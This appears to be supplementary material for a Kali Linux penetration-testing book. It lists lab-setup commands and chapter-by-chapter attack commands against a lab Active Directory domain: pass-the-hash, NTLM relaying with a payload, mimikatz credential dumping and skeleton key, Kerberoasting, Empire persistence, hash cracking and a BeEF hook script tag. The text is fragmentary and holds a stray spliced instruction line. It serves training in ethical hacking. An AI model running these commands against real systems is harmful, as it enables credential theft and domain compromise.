The Ultimate Kali Linux Book - Supplementary Materials
The Ultimate Kali Linux Book - Supplementary Materials
The Ultimate Kali Linux Book - Supplementary Materials
Note
While the content and labs found within this audiobook are based on Kali Linux 2021,
the concepts and exercises are applicable to later versions of Kali Linux that will be
released in the future.
After completing this audiobook, equipped with your imagination and newfound skills,
attempt to create additional lab scenarios and even extend your lab environment by
adding additional virtual machines to improve your skillset. This will help you to
continue learning and further develop your skills as an aspiring ethical hacker and
penetration tester.
Vagrant: https://www.vagrantup.com/downloads
Metasploitable 2:
https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
Metasploitable 3: https://app.vagrantup.com/rapid7/boxes/metasploitable3-
win2k8
C:\Users\Slayer> cd .vagrant.d
C:\Users\Slayer\.vagrant.d> del Vagrantfile
C:\Users\Slayer\.vagrant.d> vagrant init metasploitable3-
ub1404
C:\Users\Slayer\.vagrant.d> vagrant up
Command 2.10
Further reading
To learn more on the topics that were covered in this chapter, take a look at the
following resources:
Why secure web-based applications? https://hub.packtpub.com/why-secure-
web-based-applications-with-kali-linux/
FreeRadius: https://freeradius.org/
A physical wireless router that supports the WEP, WPA2-Personal, and WPA2-
Enterprise security standards
Images
C:\Users\Administrator> cd\
C:\> mkdir CorporateFileShare
C:\> net share DataShare=c:\CorporateFileShare
Command 3.4
C:\Users\Administrator> setspn -a
DC1/sqladmin.REDTEAMLAB.local:64123 REDTEAMLAB\sqladmin
Command 3.5
C:\Windows\system32> powershell
PS C:\Windows\system32> Add-Computer -DomainName
RedTeamLab.local -Restart
Command 3.7
C:\Users\Administrator> cd \
C:\> mkdir SharedData
C:\> net share DataShare=c:\SharedData
Command 3.9
client 172.16.17.199 {
secret = radiuspassword1
shortname = CorpAP
}
Code 3.2
Further reading
To learn more about the topics that were covered in this chapter, take a look at the
following resources:
Active Directory Domain Services: https://docs.microsoft.com/en-
us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-
domain-services-overview
Osintgram: https://github.com/Datalux/Osintgram
Sherlock: https://github.com/sherlock-project/sherlock
Images
kali@kali:~$ recon-web
Command 4.10
kali@kali:~$ theHarvester -h
Command 4.11
kali@kali:~$ cd Osintgram
kali@kali:~/Osintgram$ sudo python3 -m venv venv
kali@kali:~/Osintgram$ source venv/bin/activate
(venv)kali@kali:~/Osintgram$ sudo pip3 install -r
requirements.txt
Command 4.15
Further reading
To learn more about Make this a single sentence.
open source intelligence, please go to https://hub.packtpub.com/open-source-
intelligence/.
Chapter 5
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
Kali Linux 2021.2: https://www.kali.org/get-kali/
Metasploitable 2:
https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
S3Scanner: https://github.com/sa7mon/S3Scanner
Images
kali@kali:~$ cd EyeWitness/Python/setup
kali@kali:~/EyeWitness/Python/setup$ sudo ./setup.sh
Command 5.11
kali@kali:~/EyeWitness/Python/setup$ cd ..
Command 5.12
kali@kali:~$ msfconsole
Command 5.29
msf6 > search smb_version
Command 5.30
kali@kali:~$ nslookup
> flaws.cloud
Command 5.42
kali@kali:~$ cd S3_Bucket
kali@kali:~/S3_Bucket$ ls -l
Command 5.47
Further reading
To learn more about what was covered in this chapter, take a look at the following
resources:
Why is DNSSEC important?: https://www.icann.org/resources/pages/dnssec-
what-is-it-why-important-2019-03-05-en
Nessus: https://www.tenable.com/products/nessus/nessus-essentials
Images
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Command 6.3
https://www.first.org/cvss/calculator/3.0#
Command 6.4
https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:
L/PR:N/UI:N/S:U/C:H/I:H/A:H
Command 6.5
Shellter: https://www.shellterproject.com/
Not all wireless cards support monitor mode and packet injection. However, making a
minor revision to a chipset can cause the card to not work in monitor mode, and some
cards may need the drivers to be compiled and may not work out of the box.
Images
kali@kali:~$ msfconsole
Command 7.16
Further reading
To learn more about Airmon-ng, go to https://www.aircrack-
ng.org/doku.php?id=airmon-ng.
Chapter 8
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
Kali Linux 2021.2: https://www.kali.org/get-kali/
Metasploitable 2:
https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
Metasploitable 3: https://app.vagrantup.com/rapid7/boxes/metasploitable3-
win2k8
Images
kali@kali:~$ msfconsole
Command 8.21
Administrator:aad3b435b51404eeaad3b435b51404ee:e02bc503339d
51f71d913c245d35b50b
Code 8.1
C:\Users\Slayer\Downloads\hashcat-6.2.3\hashcat-6.2.3>
hashcat -m 1000 passwordhashes.txt -a 0 rockyou.txt
Command 8.28
C:\Users\Slayer\Downloads\hashcat-6.2.3\hashcat-6.2.3>
hashcat -m 1000 passwordhashes.txt -a 0 rockyou.txt --show
Command 8.29
kali@kali:~$ msfconsole
Command 8.30
kali@kali:~$ pth-winexe -U
Administrator%aad3b435b51404eeaad3b435b51404ee:e02bc503339d
51f71d913c245d35b50b //172.30.1.21 cmd
Command 8.39
kali@kali:~$ msfconsole
Command 8.43
Further reading
To learn more about the topics that were covered in this chapter, take a look at the
following resources:
Watering hole 101: https://www.trendmicro.com/vinfo/us/threat-
encyclopedia/web-attack/137/watering-hole-101
C:\Windows\system32> cd\
C:\> dir
Command 9.4
C:\Users\vagrant\Downloads\master\PacketWhisper-master>
python packetWhisper.py
Command 9.22
kali@kali:~$ cd PacketWhisper
kali@kali:~/PacketWhisper$ python packetWhisper.py
Command 9.23
Further reading
To learn more on the subject, check out the following resources:
Vulnerabilities in the application and transport layers:
https://hub.packtpub.com/vulnerabilities-in-the-application-and-transport-
layer-of-the-tcp-ip-stack/
hashcat: https://hashcat.net/hashcat/
PowerView:
https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
Bloodhound: https://github.com/BloodHoundAD/BloodHound
Images
C:\Windows\system32> cd C:\Users\bob.REDTEAMLAB\Downloads
C:\Users\bob.REDTEAMLAB\Downloads> powershell -
ExecutionPolicy bypass
Command 10.2
PS C:\Users\bob.REDTEAMLAB\Downloads> . .\PowerView.ps1
Command 10.3
PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetDomain
Command 10.4
PS C:\Users\bob.REDTEAMLAB\Downloads> Get-DomainSID
S-1-5-21-634716346-3108032190-2057695417
Command 10.5
PS C:\Users\bob.REDTEAMLAB\Downloads> Get-DomainPolicy
Command 10.6
PS C:\Users\bob.REDTEAMLAB\Downloads> Get-
NetDomainController
Command 10.7
PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetUser
Command 10.8
PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetComputer
Command 10.9
PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetGroup
Command 10.10
PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetLocalGroup -
ComputerName dc1.redteamlab.local
Command 10.11
PS C:\Users\bob.REDTEAMLAB\Downloads> Invoke-ShareFinder -
Verbose
Command 10.12
PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetGPO
Command 10.13
PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetForest
Command 10.14
PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetForestDomain
Command 10.15
PS C:\Users\bob.REDTEAMLAB\Downloads> Get-NetForestCatalog
Command 10.16
PS C:\Users\bob.REDTEAMLAB\Downloads> Find-LocalAdminAccess
-Verbose
Command 10.17
PS C:\Users\bob.REDTEAMLAB\Downloads> Invoke-
EnumerateLocalAdmin -Verbose
Command 10.18
C:\Windows\system32> cd C:\Users\bob.REDTEAMLAB\Downloads
C:\Users\bob.REDTEAMLAB\Downloads> powershell -
ExecutionPolicy bypass
Command 10.22
PS C:\Users\bob.REDTEAMLAB\Downloads> . .\SharpHound.ps1
Command 10.23
PS C:\Users\bob.REDTEAMLAB\Downloads> Invoke-Bloodhound -
CollectionMethod All -Domain redteamlab.local -ZipFileName
redteamlab.zip
Command 10.24
C:\WINDOWS\system32> cd C:\Users\Slayer\Downloads\hashcat-
6.2.3\hashcat-6.2.3
C:\Users\Slayer\Downloads\hashcat-6.2.3\hashcat-6.2.3>
hashcat -m 5600 NTLMv2-hash.txt rockyou.txt -O
Command 10.26
kali@kali:~$ cd Impacket
kali@kali:~/Impacket$ python3 ntlmrelayx.py -t
192.168.42.23 -smb2support
Command 10.31
kali@kali:~$ sudo msfconsole
Command 10.32
kali@kali:~$ cd Impacket
kali@kali:~/Impacket$ python3 ntlmrelayx.py -t
192.168.42.23 -smb2support -e /home/kali/payload4.exe
Command 10.36
Further reading
To learn more about the topics that were covered in this chapter, visit the following
links:
Active Directory Domain Services Overview:
https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/get-
started/virtual-dc/active-directory-domain-services-overview
Bloodhound documentation:
https://bloodhound.readthedocs.io/en/latest/index.html
mitm6 – https://github.com/fox-it/mitm6
Mimikatz – https://github.com/gentilkiwi/mimikatz/releases
Images
kali@kali:~$ cd mitm6
kali@kali:~/mitm6$ pip3 install -r requirements.txt
kali@kali:~/mitm6$ sudo python setup.py install
Command 11.2
kali@kali:~/mitm6$ cd mitm6
kali@kali:~/mitm6/mitm6$ python3 mitm6.py -h
Command 11.3
kali@kali:~$ cd Impacket
kali@kali:~/Impacket$ python3 ntlmrelayx.py -6 -t
ldaps://192.168.42.22 -wh wpad.redteamlab.local -l
/home/kali/mitm6-loot
Command 11.6
kali@kali:~$ ls mitm6-loot
Command 11.8
kali@kali:~$ cd Impacket
kali@kali:~/Impacket$ python3 GetUserSPNs.py
redteamlab.local/bob:Password1 -dc-ip 192.168.42.22 -
request
Command 11.15
C:\Users\Slayer\Downloads\hashcat-6.2.3\hashcat-6.2.3>
hashcat -m 13100 TGS-hash.txt rockyou.txt -O
Command 11.16
kali@kali:~$ cd Downloads
kali@kali:~/Downloads$ python3 -m http.server 8080
Command 11.17
mimikatz # sekurlsa::logonpasswords
Command 11.20
C:\Users\sqladmin> cd
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64>
mimikatz.exe
mimikatz # privilege::debug
Command 11.22
C:\Users\sqladmin> cd
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64>
mimikatz.exe
mimikatz # privilege::debug
Command 11.27
mimikatz # misc::cmd
Command 11.31
C:\Users\sqladmin> cd
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64>
mimikatz.exe
mimikatz # privilege::debug
Command 11.32
mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-
Command 11.33
mimikatz # misc::cmd
Command 11.34
C:\Users\sqladmin\Downloads\mimikatz_trunk\x64> powershell
Command 11.35
PS C:\Users\sqladmin\Downloads\mimikatz_trunk\x64> Enter-
PSSession -Computername dc1 -credential
redteamlab\Administrator
Command 11.36
[dc1]: PS C:\Users\Administrator\Documents>
Command 11.37
Further reading
To learn more about the topics that were covered in this chapter, take a look at the
following resources:
LLMNR/NBT-NS Poisoning and SMB Relay –
https://attack.mitre.org/techniques/T1557/001/
Empire: https://github.com/BC-SECURITY/Empire
Starkiller: https://github.com/BC-SECURITY/Starkiller
Images
(Empire:
usemodule/powershell/persistence/elevated/schtasks) > set
OnLogon True
Command 12.40
(Empire:
usemodule/powershell/persistence/elevated/schtasks) > set
Listener ThreatEmulation
(Empire:
usemodule/powershell/persistence/elevated/schtasks) >
execute
Command 12.41
FreeRADIUS: https://freeradius.org/
airgeddon: https://github.com/v1s1t0r1sh3r3/airgeddon
Images
Figure 13.1 – Wireless standards
/home/kali/enterprise-Corp_Wi-Fi/
Command 13.23
/home/kali/enterprise-Corp_Wi-
Fi/enterprise_captured_john_<BSSID_value>_hashes.txt
Command 13.24
/usr/share/wordlists/rockyou.txt
Command 13.25
Further reading
To learn more about the topics that were covered in this chapter, please go to the
following links:
Guidelines for Securing Wireless Local Area Networks (WLANs):
https://csrc.nist.gov/publications/detail/sp/800-153/final
Images
Further reading
To learn more about the topics covered in this chapter, you can refer to the following
links:
Social Engineering – https://www.imperva.com/learn/application-
security/social-engineering-attack/
Images
kali@kali:~$ hURL -8
"/gur/qrif/ner/fb/shaal/gurl/uvq/na/rnfgre/rtt/jvguva/gur/r
nfgre/rtt"
Command 15.4
http://localhost:3000/the/devs/are/so/funny/they/hid/an/eas
ter/egg/within/the/easter/egg
Code 15.3
Further reading
To learn more about the topics covered in this chapter, you can refer to the following
links:
OWASP Top 10 – https://owasp.org/www-project-top-ten/
Images
<html>
<head>
<title>Web Page</title>
<script src="http://<IP>:3000/hook.js"></script>
</head>
<body>
<h1>This is a vulnerable web page</h1>
<p>We are using browser exploitation.</p>
</body>
</html>
Code 16.4
Further reading
To learn more about the topics that were covered in this chapter, please go to the
following links:
OWASP Top 10: https://owasp.org/www-project-top-ten/
OWASP Top 10 as a standard:
https://owasp.org/Top10/A00_2021_How_to_use_the_OWASP_Top_10_
as_a_standard/
Images
Further reading
To learn more about the topics covered in this chapter, you can refer to the following
links:
Rules of engagement: https://hub.packtpub.com/penetration-testing-rules-
of-engagement/
CyberChef: https://gchq.github.io/CyberChef/
PayloadsAllTheThings:
https://github.com/swisskyrepo/PayloadsAllTheThings